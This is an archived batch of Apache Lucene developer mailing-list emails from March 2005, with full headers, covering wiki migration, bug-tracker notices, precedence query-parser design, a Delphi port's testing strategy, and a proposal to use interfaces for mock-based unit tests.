<mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 40096 invoked by uid 500); 12 Mar 2005 03:40:00 -0000 Delivered-To: [email protected] Received: (qmail 40093 invoked by uid 99); 12 Mar 2005 03:40:00 -0000 X-ASF-Spam-Status: No, hits=2.5 required=10.0 tests=DNS_FROM_RFC_ABUSE,FORGED_YAHOO_RCVD X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from web31104.mail.mud.yahoo.com (HELO web31104.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with SMTP; Fri, 11 Mar 2005 19:39:58 -0800 Received: (qmail 9450 invoked by uid 60001); 12 Mar 2005 03:39:56 -0000 Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; b=Beb4FXUDeCqq67VyAjYNFLc63KwO9QRpIc0C4VOnZnaFIcCeqEtaYRa2hUW/yW0gbNs6J9sky/ixNqu27qAtaI6qEJ5V8g8jCKVDtBKi+aUSVRJ3s0jLvxzBgwqk0hc3IlQ6fShBl1T4qpjY8uzTiuptaWCgtEeFpQCTTmKmlAs= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web31104.mail.mud.yahoo.com via HTTP; Fri, 11 Mar 2005 19:39:56 PST Date: Fri, 11 Mar 2005 19:39:56 -0800 (PST) From: Otis Gospodnetic <[email protected]> Subject: Re: updating jakarta site To: Lucene Developers List <[email protected]>, Henri Yandell <[email protected]> In-Reply-To: 6667 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N > > Modification of http://wiki.apache.org/general/FrontPage > > I changed the structure, but not the actual wiki link. Unsure if > Lucene has a new wiki yet, or if it's migration is on the todo list. I tried editing the FrontPage to at least change the links to Lucene TLP, but the Wiki wouldn't let me, even after logging in. Is the Wiki locked? Should it be moved? (it has 'jakarta' in the URL). Otis --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 12 03:54:21 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 65427 invoked from network); 12 Mar 2005 03:54:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 12 Mar 2005 03:54:21 -0000 Received: (qmail 45419 invoked by uid 500); 12 Mar 2005 03:54:20 -0000 Delivered-To: [email protected] Received: (qmail 44971 invoked by uid 500); 12 Mar 2005 03:54:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 44958 invoked by uid 500); 12 Mar 2005 03:54:19 -0000 Delivered-To: [email protected] Received: (qmail 44954 invoked by uid 99); 12 Mar 2005 03:54:19 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Fri, 11 Mar 2005 19:54:16 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j2C3sDsc027943 for <[email protected]>; Sat, 12 Mar 2005 04:54:13 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2C3sDPL027941; Sat, 12 Mar 2005 04:54:13 +0100 Date: Sat, 12 Mar 2005 04:54:13 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 32887] - [PATCH] IOException: Cannot delete deletables X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=32887>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=32887 [email protected] changed: What |Removed |Added ---------------------------------------------------------------------------- Status|NEW |RESOLVED Resolution| |WONTFIX ------- Additional Comments From [email protected] 2005-03-12 04:54 ------- Nobody is following up to this 2 months old bug report, so I'm closing it. If you ended up using Daniel's proposed patch and it eliminated the problem, please reopen this report. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Mar 12 19:07:28 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38299 invoked from network); 12 Mar 2005 19:07:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 12 Mar 2005 19:07:28 -0000 Received: (qmail 99043 invoked by uid 500); 12 Mar 2005 19:07:27 -0000 Delivered-To: [email protected] Received: (qmail 99016 invoked by uid 500); 12 Mar 2005 19:07:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98998 invoked by uid 500); 12 Mar 2005 19:07:26 -0000 Delivered-To: [email protected] Received: (qmail 98994 invoked by uid 99); 12 Mar 2005 19:07:26 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,RCVD_BY_IP,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from rproxy.gmail.com (HELO rproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Sat, 12 Mar 2005 11:07:26 -0800 Received: by rproxy.gmail.com with SMTP id a41so1154441rng for <[email protected]>; Sat, 12 Mar 2005 11:06:51 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:references; b=uTPv7Gid9yjY8uO/0fmdFfb5R+afKrhuNxxbiDeWfHrhxn3L2ZTCVIe6em9rqJis1glqJxTcqjDz6PLb8GveDcXE9UZQwMeZJ/96o4L9Ig6XazdDDvzkxQF/mkW8ps5dcTsrtRWPgQZQAAtj8/08AmMmFWaO4YWK0IWfIFkl9jU= Received: by 161.129.204.104 with SMTP id e38mr3645469rnb; Sat, 12 Mar 2005 09:20:11 -0800 (PST) Received: by 161.129.204.104 with HTTP; Sat, 12 Mar 2005 09:20:11 -0800 (PST) Message-ID: <[email protected]> Date: Sat, 12 Mar 2005 12:20:11 -0500 From: Henri Yandell <[email protected]> Reply-To: Henri Yandell <[email protected]> To: Otis Gospodnetic <[email protected]> Subject: Re: updating jakarta site Cc: Lucene Developers List <[email protected]> In-Reply-To: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit References: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N On Fri, 11 Mar 2005 19:39:56 -0800 (PST), Otis Gospodnetic <[email protected]> wrote: > > > Modification of http://wiki.apache.org/general/FrontPage > > > > I changed the structure, but not the actual wiki link. Unsure if > > Lucene has a new wiki yet, or if it's migration is on the todo list. > > I tried editing the FrontPage to at least change the links to Lucene > TLP, but the Wiki wouldn't let me, even after logging in. Is the Wiki > locked? Should it be moved? (it has 'jakarta' in the URL). I imagine that the Lucene wiki needs to be moved at some point so that jakarta- isn't in the url. I don't think it's locked, so not sure why you were unable to change it. I was just able to change it, though emails went to [email protected]. Hen --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Mar 13 09:36:03 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79771 invoked from network); 13 Mar 2005 09:36:02 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 13 Mar 2005 09:36:02 -0000 Received: (qmail 38185 invoked by uid 500); 13 Mar 2005 09:36:01 -0000 Delivered-To: [email protected] Received: (qmail 38148 invoked by uid 500); 13 Mar 2005 09:36:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38135 invoked by uid 99); 13 Mar 2005 09:36:00 -0000 X-ASF-Spam-Status: No, hits=0.1 required=10.0 tests=FORGED_RCVD_HELO X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from smtp-vbr9.xs4all.nl (HELO smtp-vbr9.xs4all.nl) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Sun, 13 Mar 2005 01:35:59 -0800 Received: from k8l.lan (porta.xs4all.nl [161.129.204.104]) by smtp-vbr9.xs4all.nl (8.12.11/8.12.11) with ESMTP id j2D9ZtXj023838 for <[email protected]>; Sun, 13 Mar 2005 10:35:55 +0100 (CET) (envelope-from [email protected]) From: Paul Elschot <[email protected]> To: [email protected] Subject: Precedence parser: NOT/AND, disableCoord Date: Sun, 13 Mar 2005 10:35:55 +0100 User-Agent: KMail/1.5.4 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Content-Disposition: inline Message-Id: <[email protected]> X-Virus-Scanned: by XS4ALL Virus Scanner X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Dear readers, I had a short look through the new precedence parser and noticed a possible issue. Adding this in the TestPrecedenceParser testSimple() method: assertQueryEquals("NOT a AND b", null, "-a +b"); // currently parses as -(+a +b) fails the test because it parses as NOT (a AND b). This might be improved by using the modifier (+, - , NOT) at the clause level instead of at the andExpression level. About a year ago I tried to come up with a good syntax for mixing AND/OR/NOT and +/- and brackets in a consistent way, and I gave up, dropping the + and -. However, from what I see now in the precedence parser, giving up might have been premature. It seems to be possible to make the mix after all. I also noticed a BooleanQuery(disableCoord) constructor. This would be straightforward to implement in the new BooleanScorer2 by dropping the Coordinator there. Regards, Paul Elschot --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Mar 15 00:55:58 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91016 invoked from network); 15 Mar 2005 00:55:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 15 Mar 2005 00:55:57 -0000 Received: (qmail 91982 invoked by uid 500); 15 Mar 2005 00:55:56 -0000 Delivered-To: [email protected] Received: (qmail 91955 invoked by uid 500); 15 Mar 2005 00:55:55 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 91942 invoked by uid 99); 15 Mar 2005 00:55:55 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from Unknown (HELO ehatchersolutions.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Mon, 14 Mar 2005 16:55:54 -0800 Received: by ehatchersolutions.com (Postfix, from userid 504) id 1054413E2006; Mon, 14 Mar 2005 19:55:52 -0500 (EST) Received: from [161.129.204.104] (va-chrvlle-cad1-bdgrp1-4b-b-169.chvlva.adelphia.net [161.129.204.104]) by ehatchersolutions.com (Postfix) with ESMTP id ADAFA13E2005 for <[email protected]>; Mon, 14 Mar 2005 19:55:44 -0500 (EST) Mime-Version: 1.0 (Apple Message framework v619.2) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Erik Hatcher <[email protected]> Subject: Re: Precedence parser: NOT/AND, disableCoord Date: Mon, 14 Mar 2005 17:55:33 -0700 To: [email protected] X-Mailer: Apple Mail (2.619.2) X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on javelina X-Spam-Status: No, score=-1.3 required=5.0 tests=AWL,BAYES_00, RCVD_IN_NJABL_DUL,RCVD_IN_SORBS_DUL autolearn=no version=3.0.1 X-Spam-Level: X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N On Mar 13, 2005, at 2:35 AM, Paul Elschot wrote: > I had a short look through the new precedence parser > and noticed a possible issue. > > Adding this in the TestPrecedenceParser testSimple() method: > > assertQueryEquals("NOT a AND b", null, "-a +b"); > // currently parses as -(+a +b) > > fails the test because it parses as NOT (a AND b). > > This might be improved by using the modifier (+, - , NOT) at the > clause level instead of at the andExpression level. Paul - I attempted to do this, but my efforts were not successful, and actually broke more tests than it corrected, so I reverted my local changes. I'd welcome others to give it a try, though. I'm still learning how to accomplish things with JavaCC. > About a year ago I tried to come up with a good syntax for > mixing AND/OR/NOT and +/- and brackets in a consistent > way, and I gave up, dropping the + and -. I've struggled (and still struggling) with this same thing myself. AND/OR are problematic because of the nature of boolean clauses, which individually have their own required/prohibited flags, not in _conjunction_ with another clause. > However, from what I see now in the precedence parser, > giving up might have been premature. It seems to be possible > to make the mix after all. I believe its possible, but I won't be spending time on it in the next few weeks at least - anyone interested in the next generation query parser is encouraged to pick up the torch. Erik --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Mar 15 20:57:25 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13500 invoked from network); 15 Mar 2005 20:57:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 15 Mar 2005 20:57:25 -0000 Received: (qmail 13366 invoked by uid 500); 15 Mar 2005 20:57:23 -0000 Delivered-To: [email protected] Received: (qmail 13339 invoked by uid 500); 15 Mar 2005 20:57:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 13326 invoked by uid 99); 15 Mar 2005 20:57:23 -0000 X-ASF-Spam-Status: No, hits=0.1 required=10.0 tests=FORGED_RCVD_HELO X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from smtp-vbr14.xs4all.nl (HELO smtp-vbr14.xs4all.nl) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 15 Mar 2005 12:57:21 -0800 Received: from k8l.lan (porta.xs4all.nl [161.129.204.104]) by smtp-vbr14.xs4all.nl (8.12.11/8.12.11) with ESMTP id j2FKvI7A022552 for <[email protected]>; Tue, 15 Mar 2005 21:57:18 +0100 (CET) (envelope-from [email protected]) From: Paul Elschot <[email protected]> To: [email protected] Subject: Re: Precedence parser: NOT/AND, disableCoord Date: Tue, 15 Mar 2005 21:57:17 +0100 User-Agent: KMail/1.5.4 References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Content-Disposition: inline Message-Id: <[email protected]> X-Virus-Scanned: by XS4ALL Virus Scanner X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N On Tuesday 15 March 2005 01:55, Erik Hatcher wrote: > > On Mar 13, 2005, at 2:35 AM, Paul Elschot wrote: > > I had a short look through the new precedence parser > > and noticed a possible issue. > > > > Adding this in the TestPrecedenceParser testSimple() method: > > > > assertQueryEquals("NOT a AND b", null, "-a +b"); > > // currently parses as -(+a +b) > > > > fails the test because it parses as NOT (a AND b). > > > > This might be improved by using the modifier (+, - , NOT) at the > > clause level instead of at the andExpression level. > > Paul - I attempted to do this, but my efforts were not successful, and > actually broke more tests than it corrected, so I reverted my local > changes. > > I'd welcome others to give it a try, though. I'm still learning how to > accomplish things with JavaCC. The basic rule is the deeper the nesting of the grammar construct, the higher the parsing precedence of the corresponding operator. > > About a year ago I tried to come up with a good syntax for > > mixing AND/OR/NOT and +/- and brackets in a consistent > > way, and I gave up, dropping the + and -. > > I've struggled (and still struggling) with this same thing myself. > AND/OR are problematic because of the nature of boolean clauses, which > individually have their own required/prohibited flags, not in > _conjunction_ with another clause. I'd recommend to use getOrQuery() and getAndQuery() methods to map to a boolean query via the clauses, and to implement corresponding grammar constructs that just collect the clauses. Top level for OR, next level for AND, next level for NOT. Mixing - and NOT is no problem, but + and AND is not nice. Allowing the mix should probably throw a ParseException in some unexpected corners. It might for example be possible to disallow + on the level of AND. The traditional boolean query with + and - is probably best handled at the same level as OR. In some cases, eg: (aa AND bb) OR cc NOT dd the resulting query could be mapped back to a traditional one: +aa +bb cc -dd Would this mapping back be needed? (This mapping back is the reverse of what I implemented in BooleanScorer2 which maps from the traditional form to scorers corresponding to AND, OR and NOT) How much compatibility with the existing parser is needed, in particular with the coordination factor? > > However, from what I see now in the precedence parser, > > giving up might have been premature. It seems to be possible > > to make the mix after all. > > I believe its possible, but I won't be spending time on it in the next > few weeks at least - anyone interested in the next generation query > parser is encouraged to pick up the torch. I suppose another goal is to get the span queries in the parser. Once the boolean OR/AND precedence works, it is also possible to add operators with even higher precedence for the span queries. Would you, or someone else, have any ideas on what the syntax for these should look like? How much of the span functionality should be made available via the query language? Regards, Paul Elschot --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Mar 15 21:28:12 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26158 invoked from network); 15 Mar 2005 21:28:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 15 Mar 2005 21:28:11 -0000 Received: (qmail 66657 invoked by uid 500); 15 Mar 2005 21:28:09 -0000 Delivered-To: [email protected] Received: (qmail 66628 invoked by uid 500); 15 Mar 2005 21:28:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 66614 invoked by uid 500); 15 Mar 2005 21:28:08 -0000 Delivered-To: [email protected] Received: (qmail 66611 invoked by uid 99); 15 Mar 2005 21:28:08 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,RCVD_BY_IP,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from wproxy.gmail.com (HELO wproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 15 Mar 2005 13:28:06 -0800 Received: by wproxy.gmail.com with SMTP id 36so6525wra for <[email protected]>; Tue, 15 Mar 2005 13:28:01 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding; b=Rw1JiR5y4Hk1/sqijKKHJe2Wa56JynydlTIjKdrrLNU1s9wLw+uH2ChM6JsX6jxT4X0o3hCZiVYoDPR1TAUfwzf73DzAe1hml59EPxankhwCMJlGT8JdT0UMq7t1ze4R3F27Ziizz3jNtg8BJovE0SFxTf70hDZyHlG3YhR4iqw= Received: by 161.129.204.104 with SMTP id w59mr1018434rnd; Tue, 15 Mar 2005 13:28:01 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 15 Mar 2005 13:28:01 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 15 Mar 2005 16:28:01 -0500 From: "Mario Alejandro M." <[email protected]> Reply-To: "Mario Alejandro M." <[email protected]> To: Lucene Developers List <[email protected]> Subject: Recomended strategy for perform test cases for a new port Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I finish the main (and boring!) part of port Lucene to Delphi (http://mutis.sourceforge.net/). So, I build some test cases and rigth now I pass test cases for: - BitVector - Field - DateField - Document - Number - PriorityQueue - StringHelper - Token - Analyzers (Simple,Null,Stop,Perfield) I want to know, from your experience, how go from here? I have a "compile" version but really not work. What classes/branch must pass/work rigth before the others? What path follow, how be more productive? I want to know what is the basic strategy to build the testcases (ie: Test first this, then move to that, etc...). My first inclination is get a chart of the code in UML and go for each branch. However, because some clases are interacting to others, this can be very hard to do. I prefer a strategy where I can go for the basic stuff and leave complex classes for later, so i can reach beta more quickly. In what point i can get a "working" version, ie: a version where the most basic functionality work but maybe advanced classes (like queryparser) is not. This is the CVS location, if that is necesary for something... http://cvs.sourceforge.net/viewcvs.py/mutis/Mutis/ --=20 Mario Alejandro Montoya MCP www.solucionesvulcano.com !Obtenga su sitio Web din=E1mico! MUTIS http://mutis.sourceforge.net/ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 16 03:11:17 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 98440 invoked from network); 16 Mar 2005 03:11:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 16 Mar 2005 03:11:16 -0000 Received: (qmail 95574 invoked by uid 500); 16 Mar 2005 03:11:15 -0000 Delivered-To: [email protected] Received: (qmail 95128 invoked by uid 500); 16 Mar 2005 03:11:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 95115 invoked by uid 500); 16 Mar 2005 03:11:14 -0000 Delivered-To: [email protected] Received: (qmail 95109 invoked by uid 99); 16 Mar 2005 03:11:13 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 15 Mar 2005 19:11:10 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j2G3B7iQ032732 for <[email protected]>; Wed, 16 Mar 2005 04:11:07 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j2G3B72p032730; Wed, 16 Mar 2005 04:11:07 +0100 Date: Wed, 16 Mar 2005 04:11:07 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 34028] New: - FieldSortedHitQueue.lessThan() should not be final X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=34028>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=34028 Summary: FieldSortedHitQueue.lessThan() should not be final Product: Lucene Version: 1.4 Platform: Other OS/Version: All Status: NEW Severity: normal Priority: P3 Component: Search AssignedTo: [email protected] ReportedBy: [email protected] The final seems to provide little benefit and it takes away the ability to specialize this method (which I need to do, forcing a customization of Lucene to remove the final). -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 16 21:32:45 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20033 invoked from network); 16 Mar 2005 21:32:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 16 Mar 2005 21:32:44 -0000 Received: (qmail 63285 invoked by uid 500); 16 Mar 2005 21:32:42 -0000 Delivered-To: [email protected] Received: (qmail 63247 invoked by uid 500); 16 Mar 2005 21:32:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 63227 invoked by uid 99); 16 Mar 2005 21:32:40 -0000 X-ASF-Spam-Status: No, hits=0.9 required=10.0 tests=FORGED_RCVD_HELO,FROM_HAS_MIXED_NUMS,SPF_HELO_PASS,SPF_PASS,WEIRD_PORT X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from iceman.iq-computing.de (HELO iceman.iq-computing.de) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 16 Mar 2005 13:32:37 -0800 Received: (qmail 18850 invoked from network); 16 Mar 2005 22:32:34 +0100 Received: from c226168.adsl.hansenet.de (HELO wolverine.hh.iq-computing.de) ([email protected]) by iceman.iq-computing.de with AES256-SHA encrypted SMTP; 16 Mar 2005 22:32:34 +0100 Received: (qmail 1943 invoked from network); 16 Mar 2005 22:32:57 +0100 Received: from localhost (HELO ?161.129.204.104?) (161.129.204.104) by localhost with SMTP; 16 Mar 2005 22:32:57 +0100 Message-ID: <[email protected]> Date: Wed, 16 Mar 2005 22:32:57 +0100 From: Maik Schreiber <[email protected]> User-Agent: Mozilla Thunderbird 1.0 (X11/20041227) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Interfaces X-Enigmail-Version: 161.129.204.104 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Hi, I know the issue of using interfaces in Lucene has been discussed a few times before. I'd like to bring that to the table once again, though, because I think all those discussions were missing an important point: unit testing. Without coding to interfaces it gets quite complicated to test for calls being made to an IndexWriter, for example. Of course it's possible to subclass IndexWriter and intercept all relevant calls, it still remains being a PITA. Consider the following JUnit test method for testing a hypothetical Foo.foo(IndexWriter, Document) method that does nothing more than IndexWriter.addDocument(doc): public void testFoo() throws IOException { final List addedDocuments = new ArrayList(); Directory dir = new RAMDirectory(); Analyzer analyzer = new StandardAnalyzer(); IndexWriter writer = new IndexWriter(dir, analyzer, true) { public void addDocument(Document doc) throws IOException { super.addDocument(doc); addedDocuments.add(doc); } }; Document doc = new Document(); new Foo().foo(writer, doc); assertEquals(1, addedDocuments.size()); assertSame(doc, addedDocuments.get(0)); } As you can see, you have to go at relatively great lengths just to test for a single method call. You need to create a Directory for the IndexWriter, and the IndexWriter instance itself. The IndexWriter really adds the document to the directory. In addition to that, we're taking notes of the added documents, so we can assert those later on. This complexity even grows when doing other this: Say you want to test a call to IndexReader. The problem is that IndexReader.open() needs to have a valid index lying around. So to set up the environment for that requirement you first need to create a fake index in a RAMDirectory using an IndexWriter, then use that index to test IndexReader calls. Now this is the same test method as above, but this time using EasyMock and an interface IIndexWriter (which IndexWriter hypothetically implements): public void testFoo() throws IOException { MockControl writerControl = MockControl.createControl(IIndexWriter.class); IIndexWriter writer = (IIndexWriter) writerControl.getMock(); Document doc = new Document(); writer.addDocument(doc); writerControl.setVoidCallable(); writerControl.replay(); new Foo().foo(writer, doc); writerControl.verify(); } This time, it's all straightforward: No Directory created, no IndexWriter created, no document added. We just tell the mocked-up IndexWriter what method calls to expect and what to return (or do nothing, or throw an exception). Also there's no taking notes of added documents because EasyMock does that already. The net benefit is that there are no useless objects created. Those could even harm the test results in the worst case. Also the test should run faster now, which can really add up when you have hundreds or thousands of tests. -- Maik Schreiber * http://www.blizzy.de GPG public key: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1F11D713 Key fingerprint: CF19 AFCE 6E3D 5443 9599 18B5 5640 1F11 D713 --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 16 21:41:48 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26230 invoked from network); 16 Mar 2005 21:41:48 -0000 Received: from hermes.apache.org 